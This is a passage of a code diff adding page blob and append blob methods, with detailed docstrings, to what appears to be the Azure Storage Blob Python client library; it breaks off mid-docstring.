+ If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: + A tuple of two lists of page ranges as dictionaries with 'start' and 'end' keys. + The first element are filled page ranges, the 2nd element is cleared page ranges. + :rtype: tuple(list(dict(str, str), list(dict(str, str)) + """ + warnings.warn( + "get_page_ranges is deprecated, use list_page_ranges instead", + DeprecationWarning + ) + + options = self._get_page_ranges_options( + offset=offset, + length=length, + previous_snapshot_diff=previous_snapshot_diff, + **kwargs) + try: + if previous_snapshot_diff: + ranges = self._client.page_blob.get_page_ranges_diff(**options) + else: + ranges = self._client.page_blob.get_page_ranges(**options) + except HttpResponseError as error: + process_storage_error(error) + return get_page_ranges_result(ranges) + + @distributed_trace + def list_page_ranges( + self, + *, + offset: Optional[int] = None, + length: Optional[int] = None, + previous_snapshot: Optional[Union[str, Dict[str, Any]]] = None, + **kwargs: Any + ) -> ItemPaged[PageRange]: + """Returns the list of valid page ranges for a Page Blob or snapshot + of a page blob. If `previous_snapshot` is specified, the result will be + a diff of changes between the target blob and the previous snapshot. + + :keyword int offset: + Start of byte range to use for getting valid page ranges. + If no length is given, all bytes after the offset will be searched. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword int length: + Number of bytes to use for getting valid page ranges. + If length is given, offset must be provided. + This range will return valid page ranges from the offset start up to + the specified length. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword previous_snapshot: + A snapshot value that specifies that the response will contain only pages that were changed + between target blob and previous snapshot. Changed pages include both updated and cleared + pages. The target blob may be a snapshot, as long as the snapshot specified by `previous_snapshot` + is the older of the two. + :paramtype previous_snapshot: str or Dict[str, Any] + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. 
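+
+        .. admonition:: Example (illustrative sketch):
+
+            A minimal sketch, assuming ``page_blob_client`` is an existing
+            ``BlobClient`` for a page blob (a hypothetical name)::
+
+                for page_range in page_blob_client.list_page_ranges():
+                    print(page_range.start, page_range.end)
+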
+ If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int results_per_page: + The maximum number of page ranges to retrieve per API call. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: An iterable (auto-paging) of PageRange. + :rtype: ~azure.core.paging.ItemPaged[~azure.storage.blob.PageRange] + """ + results_per_page = kwargs.pop('results_per_page', None) + options = self._get_page_ranges_options( + offset=offset, + length=length, + previous_snapshot_diff=previous_snapshot, + **kwargs) + + if previous_snapshot: + command = partial( + self._client.page_blob.get_page_ranges_diff, + **options) + else: + command = partial( + self._client.page_blob.get_page_ranges, + **options) + return ItemPaged( + command, results_per_page=results_per_page, + page_iterator_class=PageRangePaged) + + @distributed_trace + def get_page_range_diff_for_managed_disk( + self, previous_snapshot_url, # type: str + offset=None, # type: Optional[int] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Tuple[List[Dict[str, int]], List[Dict[str, int]]] + """Returns the list of valid page ranges for a managed disk or snapshot. + + .. note:: + This operation is only available for managed disk accounts. + + .. versionadded:: 12.2.0 + This operation was introduced in API version '2019-07-07'. + + :param previous_snapshot_url: + Specifies the URL of a previous snapshot of the managed disk. + The response will only contain pages that were changed between the target blob and + its previous snapshot. + :param int offset: + Start of byte range to use for getting valid page ranges. + If no length is given, all bytes after the offset will be searched. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for getting valid page ranges. + If length is given, offset must be provided. + This range will return valid page ranges from the offset start up to + the specified length. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. 
+ If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: + A tuple of two lists of page ranges as dictionaries with 'start' and 'end' keys. + The first element are filled page ranges, the 2nd element is cleared page ranges. + :rtype: tuple(list(dict(str, str), list(dict(str, str)) + """ + options = self._get_page_ranges_options( + offset=offset, + length=length, + prev_snapshot_url=previous_snapshot_url, + **kwargs) + try: + ranges = self._client.page_blob.get_page_ranges_diff(**options) + except HttpResponseError as error: + process_storage_error(error) + return get_page_ranges_result(ranges) + + def _set_sequence_number_options(self, sequence_number_action, sequence_number=None, **kwargs): + # type: (Union[str, SequenceNumberAction], Optional[str], **Any) -> Dict[str, Any] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if sequence_number_action is None: + raise ValueError("A sequence number action must be specified") + options = { + 'sequence_number_action': sequence_number_action, + 'timeout': kwargs.pop('timeout', None), + 'blob_sequence_number': sequence_number, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def set_sequence_number(self, sequence_number_action, sequence_number=None, **kwargs): + # type: (Union[str, SequenceNumberAction], Optional[str], **Any) -> Dict[str, Union[str, datetime]] + """Sets the blob sequence number. + + :param str sequence_number_action: + This property indicates how the service should modify the blob's sequence + number. See :class:`~azure.storage.blob.SequenceNumberAction` for more information. + :param str sequence_number: + This property sets the blob's sequence number. The sequence number is a + user-controlled property that you can use to track requests and manage + concurrency issues. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. 
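+
+        .. admonition:: Example (illustrative sketch):
+
+            A minimal sketch, assuming ``page_blob_client`` is an existing
+            ``BlobClient`` for a page blob (a hypothetical name)::
+
+                # 'update' pins the sequence number to the supplied value;
+                # a SequenceNumberAction value may be passed instead of a string.
+                page_blob_client.set_sequence_number("update", "7")
+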
+ :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._set_sequence_number_options( + sequence_number_action, sequence_number=sequence_number, **kwargs) + try: + return self._client.page_blob.update_sequence_number(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _resize_blob_options(self, size, **kwargs): + # type: (int, **Any) -> Dict[str, Any] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if size is None: + raise ValueError("A content length must be specified for a Page Blob.") + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + options = { + 'blob_content_length': size, + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_info': cpk_info, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def resize_blob(self, size, **kwargs): + # type: (int, **Any) -> Dict[str, Union[str, datetime]] + """Resizes a page blob to the specified size. + + If the specified value is less than the current size of the blob, + then all pages above the specified value are cleared. + + :param int size: + Size used to resize blob. Maximum size for a page blob is up to 1 TB. + The page blob size must be aligned to a 512-byte boundary. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. 
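+
+        .. admonition:: Example (illustrative sketch):
+
+            A minimal sketch, assuming ``page_blob_client`` is an existing
+            ``BlobClient`` for a page blob (a hypothetical name)::
+
+                page_blob_client.resize_blob(1024)  # new size must be 512-byte aligned
+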
+ Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._resize_blob_options(size, **kwargs) + try: + return self._client.page_blob.resize(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _upload_page_options( # type: ignore + self, page, # type: bytes + offset, # type: int + length, # type: int + **kwargs + ): + # type: (...) -> Dict[str, Any] + if isinstance(page, six.text_type): + page = page.encode(kwargs.pop('encoding', 'UTF-8')) + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + + if offset is None or offset % 512 != 0: + raise ValueError("offset must be an integer that aligns with 512 page size") + if length is None or length % 512 != 0: + raise ValueError("length must be an integer that aligns with 512 page size") + end_range = offset + length - 1 # Reformat to an inclusive range index + content_range = 'bytes={0}-{1}'.format(offset, end_range) # type: ignore + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + seq_conditions = SequenceNumberAccessConditions( + if_sequence_number_less_than_or_equal_to=kwargs.pop('if_sequence_number_lte', None), + if_sequence_number_less_than=kwargs.pop('if_sequence_number_lt', None), + if_sequence_number_equal_to=kwargs.pop('if_sequence_number_eq', None) + ) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + validate_content = kwargs.pop('validate_content', False) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + options = { + 'body': page[:length], + 'content_length': length, + 'transactional_content_md5': None, + 'timeout': kwargs.pop('timeout', None), + 'range': content_range, + 'lease_access_conditions': access_conditions, + 'sequence_number_access_conditions': seq_conditions, + 'modified_access_conditions': mod_conditions, + 'validate_content': validate_content, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def upload_page( # type: ignore + self, page, # type: bytes + offset, # type: int + length, # type: int + **kwargs + ): + # type: (...) 
-> Dict[str, Union[str, datetime]] + """The Upload Pages operation writes a range of pages to a page blob. + + :param bytes page: + Content of the page. + :param int offset: + Start of byte range to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword bool validate_content: + If true, calculates an MD5 hash of the page content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. 
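+
+        .. admonition:: Example (illustrative sketch):
+
+            A minimal sketch, assuming ``page_blob_client`` is an existing
+            ``BlobClient`` for a page blob (a hypothetical name)::
+
+                data = b"0" * 512  # offset and length must be 512-byte aligned
+                page_blob_client.upload_page(data, offset=0, length=512)
+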
If a default
+            encryption scope has been defined at the container, this value will override it if the
+            container-level scope is configured to allow overrides. Otherwise an error will be raised.
+
+            .. versionadded:: 12.2.0
+
+        :keyword str encoding:
+            Defaults to UTF-8.
+        :keyword int timeout:
+            The timeout parameter is expressed in seconds.
+        :returns: Blob-updated property dict (Etag and last modified).
+        :rtype: dict(str, Any)
+        """
+        options = self._upload_page_options(
+            page=page,
+            offset=offset,
+            length=length,
+            **kwargs)
+        try:
+            return self._client.page_blob.upload_pages(**options)  # type: ignore
+        except HttpResponseError as error:
+            process_storage_error(error)
+
+    def _upload_pages_from_url_options(  # type: ignore
+            self, source_url,  # type: str
+            offset,  # type: int
+            length,  # type: int
+            source_offset,  # type: int
+            **kwargs
+    ):
+        # type: (...) -> Dict[str, Any]
+        if self.require_encryption or (self.key_encryption_key is not None):
+            raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION)
+
+        # TODO: extract the code to a method format_range
+        if offset is None or offset % 512 != 0:
+            raise ValueError("offset must be an integer that aligns with 512 page size")
+        if length is None or length % 512 != 0:
+            raise ValueError("length must be an integer that aligns with 512 page size")
+        if source_offset is None or source_offset % 512 != 0:
+            raise ValueError("source_offset must be an integer that aligns with 512 page size")
+
+        # Format ranges; the end of each range is inclusive, hence the -1.
+        end_range = offset + length - 1
+        destination_range = 'bytes={0}-{1}'.format(offset, end_range)
+        source_range = 'bytes={0}-{1}'.format(source_offset, source_offset + length - 1)
+
+        seq_conditions = SequenceNumberAccessConditions(
+            if_sequence_number_less_than_or_equal_to=kwargs.pop('if_sequence_number_lte', None),
+            if_sequence_number_less_than=kwargs.pop('if_sequence_number_lt', None),
+            if_sequence_number_equal_to=kwargs.pop('if_sequence_number_eq', None)
+        )
+        source_authorization = kwargs.pop('source_authorization', None)
+        access_conditions = get_access_conditions(kwargs.pop('lease', None))
+        mod_conditions = get_modify_conditions(kwargs)
+        source_mod_conditions = get_source_conditions(kwargs)
+        cpk_scope_info = get_cpk_scope_info(kwargs)
+        source_content_md5 = kwargs.pop('source_content_md5', None)
+        cpk = kwargs.pop('cpk', None)
+        cpk_info = None
+        if cpk:
+            if self.scheme.lower() != 'https':
+                raise ValueError("Customer provided encryption key must be used over HTTPS.")
+            cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash,
+                               encryption_algorithm=cpk.algorithm)
+
+        options = {
+            'copy_source_authorization': source_authorization,
+            'source_url': source_url,
+            'content_length': 0,
+            'source_range': source_range,
+            'range': destination_range,
+            'source_content_md5': bytearray(source_content_md5) if source_content_md5 else None,
+            'timeout': kwargs.pop('timeout', None),
+            'lease_access_conditions': access_conditions,
+            'sequence_number_access_conditions': seq_conditions,
+            'modified_access_conditions': mod_conditions,
+            'source_modified_access_conditions': source_mod_conditions,
+            'cpk_scope_info': cpk_scope_info,
+            'cpk_info': cpk_info,
+            'cls': return_response_headers}
+        options.update(kwargs)
+        return options
+
+    @distributed_trace
+    def upload_pages_from_url(self, source_url,  # type: str
+                              offset,  # type: int
+                              length,  # type: int
+                              source_offset,  # type: int
+                              **kwargs
+                              ):
+        # type: (...)
-> Dict[str, Any] + """ + The Upload Pages operation writes a range of pages to a page blob where + the contents are read from a URL. + + :param str source_url: + The URL of the source data. It can point to any Azure Blob or File, that is either public or has a + shared access signature attached. + :param int offset: + Start of byte range to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int source_offset: + This indicates the start of the range of bytes(inclusive) that has to be taken from the copy source. + The service will read the same number of bytes as the destination range (length-offset). + :keyword bytes source_content_md5: + If given, the service will calculate the MD5 hash of the block content and compare against this value. + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. 
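+
+        .. admonition:: Example (illustrative sketch):
+
+            A minimal sketch, assuming ``page_blob_client`` is an existing
+            ``BlobClient`` for a page blob and ``source_blob_url`` is a readable
+            source URL; both names are hypothetical::
+
+                page_blob_client.upload_pages_from_url(
+                    source_blob_url, offset=0, length=512, source_offset=0)
+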
+ Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + options = self._upload_pages_from_url_options( + source_url=self._encode_source_url(source_url), + offset=offset, + length=length, + source_offset=source_offset, + **kwargs + ) + try: + return self._client.page_blob.upload_pages_from_url(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _clear_page_options(self, offset, length, **kwargs): + # type: (int, int, **Any) -> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + seq_conditions = SequenceNumberAccessConditions( + if_sequence_number_less_than_or_equal_to=kwargs.pop('if_sequence_number_lte', None), + if_sequence_number_less_than=kwargs.pop('if_sequence_number_lt', None), + if_sequence_number_equal_to=kwargs.pop('if_sequence_number_eq', None) + ) + mod_conditions = get_modify_conditions(kwargs) + if offset is None or offset % 512 != 0: + raise ValueError("offset must be an integer that aligns with 512 page size") + if length is None or length % 512 != 0: + raise ValueError("length must be an integer that aligns with 512 page size") + end_range = length + offset - 1 # Reformat to an inclusive range index + content_range = 'bytes={0}-{1}'.format(offset, end_range) + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'content_length': 0, + 'timeout': kwargs.pop('timeout', None), + 'range': content_range, + 'lease_access_conditions': access_conditions, + 'sequence_number_access_conditions': seq_conditions, + 'modified_access_conditions': 
mod_conditions, + 'cpk_info': cpk_info, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def clear_page(self, offset, length, **kwargs): + # type: (int, int, **Any) -> Dict[str, Union[str, datetime]] + """Clears a range of pages. + + :param int offset: + Start of byte range to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :param int length: + Number of bytes to use for writing to a section of the blob. + Pages must be aligned with 512-byte boundaries, the start offset + must be a modulus of 512 and the length must be a modulus of + 512. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int if_sequence_number_lte: + If the blob's sequence number is less than or equal to + the specified value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_lt: + If the blob's sequence number is less than the specified + value, the request proceeds; otherwise it fails. + :keyword int if_sequence_number_eq: + If the blob's sequence number is equal to the specified + value, the request proceeds; otherwise it fails. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified). + :rtype: dict(str, Any) + """ + options = self._clear_page_options(offset, length, **kwargs) + try: + return self._client.page_blob.clear_pages(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _append_block_options( # type: ignore + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) 
-> Dict[str, Any] + if self.require_encryption or (self.key_encryption_key is not None): + raise ValueError(_ERROR_UNSUPPORTED_METHOD_FOR_ENCRYPTION) + + if isinstance(data, six.text_type): + data = data.encode(kwargs.pop('encoding', 'UTF-8')) # type: ignore + if length is None: + length = get_length(data) + if length is None: + length, data = read_length(data) + if length == 0: + return {} + if isinstance(data, bytes): + data = data[:length] + + appendpos_condition = kwargs.pop('appendpos_condition', None) + maxsize_condition = kwargs.pop('maxsize_condition', None) + validate_content = kwargs.pop('validate_content', False) + append_conditions = None + if maxsize_condition or appendpos_condition is not None: + append_conditions = AppendPositionAccessConditions( + max_size=maxsize_condition, + append_position=appendpos_condition + ) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + options = { + 'body': data, + 'content_length': length, + 'timeout': kwargs.pop('timeout', None), + 'transactional_content_md5': None, + 'lease_access_conditions': access_conditions, + 'append_position_access_conditions': append_conditions, + 'modified_access_conditions': mod_conditions, + 'validate_content': validate_content, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def append_block( # type: ignore + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + length=None, # type: Optional[int] + **kwargs + ): + # type: (...) -> Dict[str, Union[str, datetime, int]] + """Commits a new block of data to the end of the existing append blob. + + :param data: + Content of the block. This can be bytes, text, an iterable or a file-like object. + :type data: bytes or str or Iterable + :param int length: + Size of the block in bytes. + :keyword bool validate_content: + If true, calculates an MD5 hash of the block content. The storage + service checks the hash of the content that has arrived + with the hash that was sent. This is primarily valuable for detecting + bitflips on the wire if using http instead of https, as https (the default), + will already validate. Note that this MD5 hash is not stored with the + blob. + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already 